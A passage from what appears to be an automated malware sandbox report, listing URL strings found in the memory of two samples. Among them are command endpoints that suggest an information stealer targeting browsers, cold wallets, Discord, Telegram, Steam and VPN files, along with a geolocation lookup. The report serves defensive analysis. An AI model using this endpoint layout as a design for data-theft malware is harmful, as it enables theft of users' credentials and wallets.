                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.677401695.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageP
                    Source: 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagePale
                    Source: 757C.exe, 00000016.00000002.677458295.0000000002F3D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity$
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Confirm
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponse
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponseP
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponseD
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponseP
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponsensesResponseoon
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Init
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplay
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplayResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsers
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsersResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWallets
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWalletsResponse
                    Source: 8433.exe, 00000013.00000002.685746965.00000000047FE000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDefenders
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDefendersResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDiscord
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDiscordResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnections
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnectionsResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartHardwares
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartHardwaresResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsers
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsersResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwares
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseD
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponseP
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguages
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguagesResponse
                    Source: 8433.exe, 00000013.00000002.678778613.000000000387D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguagesResponseP
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartNordVPN
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartNordVPNResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPN
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPNResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProcesses
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProcessesResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677435791.0000000003726000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPN
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPNResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartScannedFiles
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartScannedFilesResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartSteamFiles
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartSteamFilesResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFiles
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFilesResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 757C.exe, 00000016.00000002.659629254.00000000029C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeOc
Source: 8433.exe, 00000013.00000000.488560836.000000000085A000.00000002.00020000.sdmp | String found in binary or memory: http://www.rarlab.com
Source: 8433.exe, 00000013.00000000.488560836.000000000085A000.00000002.00020000.sdmp | String found in binary or memory: http://www.rarlab.com/themes.htm
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb
Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/geoip
Source: 8433.exe | String found in binary or memory: https://api.ip.sb/geoip%USERPEnviro
Source: 757C.exe, 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, 757C.exe, 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487627523.000001D408BA3000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: https://get.adob
